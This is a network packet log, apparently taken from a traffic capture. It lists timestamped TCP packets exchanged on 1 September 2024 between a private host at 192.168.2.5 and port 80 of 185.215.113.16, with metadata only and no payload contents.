Sep 1, 2024 06:28:04.390458107 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390480042 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390491962 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390564919 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390577078 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390597105 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390616894 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390625954 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390645027 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390655994 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390666008 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390667915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.390672922 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390707016 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.390721083 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.391069889 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.391081095 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.391092062 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.391110897 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.391113043 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.391134024 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.391159058 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.392877102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.392918110 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393084049 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393095016 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393105984 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393115997 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393117905 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393126011 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393131018 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393137932 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393148899 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393157959 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393167973 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393171072 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393178940 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393189907 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393202066 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393203974 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393224955 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393241882 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393336058 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393347025 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393359900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.393372059 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.393393040 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.538085938 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538099051 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538110018 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538181067 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.538227081 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538242102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538255930 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538265944 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538268089 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.538275957 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538285971 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538297892 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.538331985 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.538608074 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538619041 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.538652897 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.538675070 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.539441109 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.539485931 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.539618969 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.539628983 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.539666891 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.540397882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540409088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540419102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540441036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540452003 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.540452003 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540462017 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540472031 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540476084 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.540487051 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540496111 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.540498018 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.540508032 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.540537119 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541312933 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541357994 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541646957 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541656971 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541668892 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541678905 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541687012 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541701078 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541726112 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541766882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541778088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541786909 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541796923 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541806936 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541810989 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541817904 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541829109 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.541831970 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541851044 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.541867971 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.542104006 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542118073 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542154074 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.542535067 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542545080 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542555094 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542563915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542572975 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.542572975 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542583942 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542594910 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542598963 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.542629004 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.542824030 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542834044 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542843103 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542861938 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.542880058 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.542953968 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542964935 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542973995 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542984962 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542993069 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.542993069 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543003082 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543013096 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543023109 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543026924 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543032885 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543037891 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543042898 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543062925 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543075085 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543277025 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543318033 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543345928 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543355942 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543389082 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543538094 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543553114 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543564081 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543574095 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543581963 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543584108 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543605089 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543629885 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543941975 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543951988 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543962955 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543972969 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543979883 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.543982983 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543992043 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.543997049 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.544001102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.544011116 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.544019938 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.544020891 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.544040918 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.544059038 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545423031 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545433998 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545445919 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545469999 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545486927 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545495033 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545496941 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545506954 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545516014 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545521975 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545527935 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545540094 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545543909 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545555115 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545562983 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545569897 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545581102 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.545584917 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545603037 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.545628071 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.626593113 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626630068 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626635075 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626780033 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.626811981 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626823902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626833916 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626844883 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626856089 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.626857042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.626868963 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.626894951 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.627012014 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.627022028 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.627032042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.627042055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.627054930 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.627073050 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.627348900 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.627357960 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.627372026 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.627384901 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.627402067 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.627419949 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.688911915 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.688922882 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.688934088 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.688972950 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689114094 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689124107 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689132929 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689142942 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689156055 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689162016 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689163923 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689182043 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689196110 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689219952 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689260006 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689260960 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689307928 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689431906 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689440012 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689460993 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689476013 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689479113 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689486027 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689487934 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689497948 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689502954 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689519882 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689543009 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689675093 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689717054 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689754009 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689764023 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689800978 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689887047 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689897060 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.689924002 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.689939022 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.690179110 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690222025 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.690629959 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690670013 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.690707922 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690718889 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690751076 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.690763950 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.690845966 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690855980 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690874100 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690882921 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690891027 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.690893888 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690903902 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.690911055 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.690937042 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691073895 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691085100 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691113949 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691181898 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691190958 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691219091 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691241980 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691303015 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691344023 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691371918 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691382885 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691406965 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691414118 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691446066 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691901922 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691910982 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691920996 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.691940069 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.691960096 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.692015886 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692032099 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692059994 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.692071915 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.692131042 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692141056 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692151070 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692161083 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692171097 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692173004 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.692182064 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.692190886 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.692218065 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.693547010 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.693557024 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.693567038 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.693594933 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.693604946 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.693798065 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.693809032 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.693819046 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.693840981 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.693850994 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694037914 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694078922 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694118977 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694129944 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694139004 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694150925 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694160938 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694161892 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694174051 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694183111 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694201946 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694224119 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694283009 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694293976 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694303036 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694324017 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694345951 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694561005 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694571018 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694581032 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694602013 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694619894 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694948912 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694960117 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694973946 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694984913 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.694992065 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.694996119 CEST	80	49705	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:04.695015907 CEST	49705	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:04.695029974 CEST	49705	80	192.168.2.5	185.215.113.16
